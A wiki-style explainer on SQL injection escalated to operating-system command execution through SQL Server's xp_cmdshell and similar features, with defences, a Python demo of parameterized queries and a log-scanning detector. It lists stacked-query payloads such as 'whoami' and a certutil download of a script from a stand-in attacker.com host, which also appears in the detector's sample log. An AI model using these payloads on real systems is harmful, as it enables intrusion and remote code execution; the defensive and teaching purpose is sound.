info ‐ SQL Injection with Command Execution - taylorjohn/hacking GitHub Wiki

SQL Injection with Command Execution

SQL injection with command execution is a SQL injection vulnerability that an attacker escalates into execution of operating-system commands on the host that runs the database server. Ordinary SQL injection alters the query the application meant to run; here the injected input also appends statements that invoke a database feature able to run programs or write files, so a flaw in the application's query handling turns into code execution on the database host. The consequences range from unauthorized access to the data in the database to complete compromise of the affected system.

Description

SQL injection with command execution occurs when an attacker can inject SQL into an application's input fields or parameters and the database server exposes a feature that reaches the operating system. By appending statements to the original query (stacked queries, separated by `;`, which SQL Server executes as one batch), the attacker invokes that feature with a command of their choosing. The canonical case is Microsoft SQL Server's `xp_cmdshell` extended stored procedure, which passes a command line to the Windows command interpreter; it has been disabled by default since SQL Server 2005, but a login in the `sysadmin` role can re-enable it with `sp_configure`. Other engines have equivalents: PostgreSQL's `COPY ... FROM PROGRAM` (available to superusers and members of `pg_execute_server_program`), and MySQL where a login with the `FILE` privilege writes a web shell into a served directory with `SELECT ... INTO OUTFILE`, or where a `sys_exec`-style user-defined function has been loaded. MySQL's `LOAD DATA LOCAL INFILE` is often listed here by mistake: it reads files from the client, which is a data-disclosure issue, not command execution.

How to Inject

Attackers reach command execution with the same delivery techniques as traditional SQL injection. What differs is that the injected call has to run as a statement of its own, and that the command's output does not appear in the application's normal response unless the attacker arranges for it. Common techniques include:

  • Union-Based Injection: `UNION SELECT` can only read data and cannot invoke a procedure, so it does not execute the command itself. Execution needs stacked queries: the payload terminates the original statement with `;` and appends `EXEC xp_cmdshell '...'`, which requires a database and driver that accept several statements in one call (SQL Server does by default; most MySQL client APIs do not). Once the command's output has been captured in a table (for example with `INSERT INTO sometable EXEC xp_cmdshell '...'`), a `UNION SELECT` against that table returns the output in the application's normal response.

  • Boolean-Based Blind Injection: when the application reflects nothing, the attacker still runs the command through a stacked query, then infers its captured output one character at a time from true/false conditions that change the response (for example, whether a `SUBSTRING` of the captured row equals a guessed character). Time delays (`WAITFOR DELAY`) serve the same purpose where even the boolean difference is unavailable.

  • Out-of-Band (OOB) Injection: the attacker makes the database host deliver the result over a channel the attacker controls, for example by having the executed command issue a DNS lookup or HTTP request to an attacker-controlled host with the output encoded in the hostname or URL. On SQL Server, `xp_dirtree` or `xp_fileexist` with a UNC path triggers an outbound SMB/DNS request even when `xp_cmdshell` is unavailable. This is used when the normal response reflects nothing and blind inference is too slow.

How to Protect

Preventing SQL injection with command execution needs two layers: stop the injection itself, and make sure that even a successful injection cannot reach the operating system. Key protective measures include:

  • Input Validation and Sanitization: Validate user-supplied input against an allowlist of expected formats (a numeric ID must be an integer, for instance) before it reaches the data layer. Validation alone is not a complete defence against injection; treat it as a secondary control behind parameterized queries.

  • Parameterized Queries: Use parameterized queries or prepared statements to interact with the database, rather than concatenating user input into SQL text. The database then treats the input strictly as a value: a payload such as `1'; EXEC xp_cmdshell 'whoami'; --` matches no row, and the stacked statement is never parsed. Avoid APIs that execute multi-statement batches, and keep multi-statement mode off in drivers that offer it.

  • Least Privilege: Run the application under a dedicated low-privilege database login, never `sa` or a `sysadmin` member. By default only `sysadmin` members can enable or run `xp_cmdshell`, so an application login without that role cannot reach the operating system even when injection is present. Keep `xp_cmdshell` disabled (its default), set MySQL's `secure_file_priv`, and do not grant `FILE` or PostgreSQL's `pg_execute_server_program` to application accounts.

  • Firewalling and WAFs: Deploy web application firewalls (WAFs) as defence in depth; they block known payload patterns but are bypassable and do not replace the coding controls above. Restrict outbound network access from the database host as well, so that a command which does run cannot download tooling or exfiltrate results over DNS or HTTP.
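The difference between the concatenation and the parameterized pattern described in the bullets above, as an added example that is not code from the wiki page: a vulnerable lookup that splices input into SQL text and runs it through a call that accepts stacked statements, beside the parameterized version, both executed in Python against an in-memory SQLite database. SQLite has no `xp_cmdshell`, so the hypothetical payload leaves a side table instead of running a command; the users table and the payload are constructed for this example.

```python
import sqlite3

# Constructed sample data (not from the wiki page): a two-row users table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("1", "alice"), ("2", "bob")])
    conn.commit()
    return conn

# Hypothetical attacker input in the shape the page uses: close the string
# literal, stack extra statements, and comment out the rest of the query.
# xp_cmdshell does not exist in SQLite, so the stacked statements leave a
# visible side effect (a new table) instead of running an OS command.
PAYLOAD = ("1'; CREATE TABLE loot(note TEXT); "
           "INSERT INTO loot VALUES ('stacked statement ran'); --")

def table_names(conn):
    """Return the names of all tables, so side effects can be observed."""
    rows = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name"
    ).fetchall()
    return [r[0] for r in rows]

def lookup_vulnerable(conn, user_id):
    """Vulnerable: user input is concatenated into the SQL text.

    executescript() runs every statement it is handed, which models a
    driver/database pair that accepts stacked queries in one call (as SQL
    Server does). It discards result rows, just as a real application never
    shows the attacker the output of a stacked statement. Returns the SQL
    text that was actually sent so the reader can see the final query."""
    sql = "SELECT name FROM users WHERE id = '" + user_id + "'"
    conn.executescript(sql)
    return sql

def lookup_parameterized(conn, user_id):
    """Hardened: the same lookup with a bound parameter.

    The driver sends the query text and the value separately, so the quote,
    the semicolon and the comment marker are just characters in a value that
    matches no row. A second statement is never parsed."""
    rows = conn.execute(
        "SELECT name FROM users WHERE id = ?", (user_id,)
    ).fetchall()
    return [r[0] for r in rows]

def demo():
    """Run both versions against the same payload and report what changed."""
    vuln = make_db()
    lookup_vulnerable(vuln, PAYLOAD)
    safe = make_db()
    injected_rows = lookup_parameterized(safe, PAYLOAD)
    return {
        "vulnerable_tables": table_names(vuln),           # ['loot', 'users']
        "parameterized_rows": injected_rows,              # []
        "parameterized_tables": table_names(safe),        # ['users']
        "normal_lookup": lookup_parameterized(safe, "1"),  # ['alice']
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `loot` table appearing only on the concatenating path is the whole story: the same bytes that created it are, on the parameterized path, a value the database compares against the `id` column and nothing more.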

Examples of SQL Injection with Command Execution

The payloads below target Microsoft SQL Server and assume the injection point sits inside a single-quoted string: the leading `1'` closes that string, `;` starts a stacked statement, and `--` comments out the remainder of the original query. They also assume `xp_cmdshell` is enabled, or that the application's login is a `sysadmin` member that can enable it first through `sp_configure` (`show advanced options`, then `xp_cmdshell`, each followed by `RECONFIGURE`). Because `xp_cmdshell` hands the string to `cmd.exe`, the commands must be Windows commands. Their output is not returned to the application unless the attacker captures it (for example with `INSERT INTO sometable EXEC xp_cmdshell '...'`) and reads it back, or sends it out of band.

  1. List Files in Directory:

    • Description: Runs `dir` (the Windows counterpart of `ls`, which `cmd.exe` would not find) to list the files in the SQL Server service's working directory.
    • SQL Injection: 1'; EXEC xp_cmdshell 'dir'; --
  2. Download a Remote Script:

    • Description: Uses a Windows-native downloader to fetch a script from an attacker-controlled server onto the database host. Downloading alone does not run it; a second stacked command would be needed to execute the file.
    • SQL Injection: 1'; EXEC xp_cmdshell 'certutil -urlcache -split -f http://attacker.com/malicious.ps1 C:\Windows\Temp\malicious.ps1'; --
  3. Display Current User:

    • Description: Returns the Windows account the SQL Server service runs as, which is also the account the injected commands execute under.
    • SQL Injection: 1'; EXEC xp_cmdshell 'whoami'; --
  4. Display System Information:

    • Description: Returns operating-system version and patch information (`systeminfo` is the Windows counterpart of `uname -a`).
    • SQL Injection: 1'; EXEC xp_cmdshell 'systeminfo'; --
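Detection logic for the payload shapes listed above, as an added example that is not part of the wiki page: a small Python scanner that classifies statements from a tab-separated query log and flags `xp_cmdshell` calls, `sp_configure` enabling or disabling of `xp_cmdshell`, stacked statements, `UNION SELECT` and trailing comment markers. The log lines, the login names and the attacker host are constructed for this example. String literals are blanked before the structural checks so that data values containing the same keywords do not trip them.

```python
import re

# Constructed sample query log (not real logs): one statement per line,
# tab-separated as "timestamp<TAB>login<TAB>statement_text".
SAMPLE_LOG = """\
2024-01-01T10:00:00Z\twebapp\tSELECT name FROM users WHERE id = '42'
2024-01-01T10:00:05Z\twebapp\tSELECT name FROM users WHERE id = '1'; EXEC xp_cmdshell 'whoami'; --'
2024-01-01T10:00:07Z\twebapp\tSELECT name FROM users WHERE id = '1'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --'
2024-01-01T10:00:09Z\twebapp\tSELECT name FROM users WHERE id = '1'; EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://attacker.com/m.ps1 C:\\Windows\\Temp\\m.ps1'; --'
2024-01-01T10:00:11Z\twebapp\tSELECT name FROM users WHERE id = '1' UNION SELECT 1,2,3,4 --'
2024-01-01T10:00:13Z\tdba\tEXEC sp_configure 'xp_cmdshell', 0
"""

# T-SQL string literal, including the doubled-quote escape ('').
STRING_LITERAL = re.compile(r"'(?:[^']|'')*'")
# A statement terminator followed by another statement keyword: stacked query.
STACKED = re.compile(
    r";\s*(?:EXEC|EXECUTE|INSERT|UPDATE|DELETE|DECLARE|CREATE|DROP|ALTER|"
    r"RECONFIGURE|SELECT|WAITFOR)\b", re.I)
XP_CMDSHELL_CALL = re.compile(r"\bxp_cmdshell\b", re.I)
# The option name lives inside a literal, so this one runs on the raw text.
XP_CMDSHELL_CONFIG = re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*(\d)", re.I)
UNION_SELECT = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)

def classify(statement):
    """Return the set of indicator tags found in one SQL statement."""
    stripped = STRING_LITERAL.sub("''", statement)
    tags = set()
    if XP_CMDSHELL_CALL.search(stripped):
        tags.add("xp_cmdshell_call")
    for m in XP_CMDSHELL_CONFIG.finditer(statement):
        tags.add("xp_cmdshell_enable" if m.group(1) == "1"
                 else "xp_cmdshell_disable")
    if STACKED.search(stripped):
        tags.add("stacked_query")
    if UNION_SELECT.search(stripped):
        tags.add("union_select")
    if "--" in stripped:
        tags.add("comment_terminator")
    return tags

def severity(tags):
    """Rank a tag set; None means nothing worth reporting."""
    if tags & {"xp_cmdshell_call", "xp_cmdshell_enable"}:
        return "critical"
    if tags & {"stacked_query", "union_select"}:
        return "high"
    if "xp_cmdshell_disable" in tags:
        return "medium"   # a legitimate hardening step, but worth auditing
    return "low" if tags else None

def scan(log_text):
    """Parse the tab-separated log and return one finding per flagged line."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, login, statement = line.split("\t", 2)
        tags = classify(statement)
        sev = severity(tags)
        if sev:
            findings.append({"time": ts, "login": login,
                             "severity": sev, "tags": sorted(tags)})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["login"], f["severity"], ", ".join(f["tags"]))
```

Running it on the sample log reports the three `xp_cmdshell` attempts as critical, the `UNION SELECT` probe as high, and the DBA's disabling of `xp_cmdshell` as medium, while the ordinary lookup on the first line produces no finding. A stacked statement issued by the application's own login is the strongest signal here: a correctly parameterized application never sends one.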

Parameterized queries remove the injection itself, and a least-privilege database login with `xp_cmdshell` and its equivalents disabled removes the path from injection to the operating system. Applied together with the other measures above, they let developers mitigate the risk of exploitation and protect their applications from unauthorized command execution.